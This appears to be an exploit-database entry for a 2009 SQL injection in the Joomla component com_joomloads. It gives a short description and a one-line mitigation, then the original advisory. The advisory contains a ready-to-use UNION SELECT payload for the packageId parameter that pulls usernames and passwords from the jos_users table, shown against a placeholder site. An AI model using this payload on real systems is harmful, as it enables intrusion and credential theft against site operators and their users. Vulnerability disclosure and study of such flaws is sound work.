Joomla Component com_joomloads (packageId) Remote SQL Injection Vuln

vendor:

com_joomloads

by:

Mr.tro0oqy

8,8

CVSS

HIGH

SQL Injection

CWE

Product Name: com_joomloads

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Joomla Component com_joomloads (packageId) Remote SQL Injection Vuln

A vulnerability in the Joomla Component com_joomloads (packageId) allows an attacker to inject arbitrary SQL commands via the packageId parameter. An attacker can exploit this vulnerability to gain access to sensitive information stored in the database, such as usernames and passwords.

Mitigation:

Ensure that user-supplied input is validated and filtered before being used in SQL queries.

Source

Exploit-DB raw data:

=======================================================
+++++++++++++++++++ information +++++++++++++++++++++++
=======================================================
[+] Script : Joomla Component com_joomloads (packageId) Remote SQL Injection Vuln

[+] Found by : Mr.tro0oqy  
   
[+] C0ntact : t.4@windowslive.com <Yemeni ana>
=======================================================
+++++++++++++++++++++++ Exploit +++++++++++++++++++++++
=======================================================
exploit:
--------
http://localhost/path/index.php?option=com_joomloads&view=package&Itemid=2&packageId=<SQL CODE>



demo:
-----
http://www.xxx.com/index.php?option=com_joomloads&view=package&Itemid=2&packageId=-156+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17+from+jos_users--

# milw0rm.com [2009-07-23]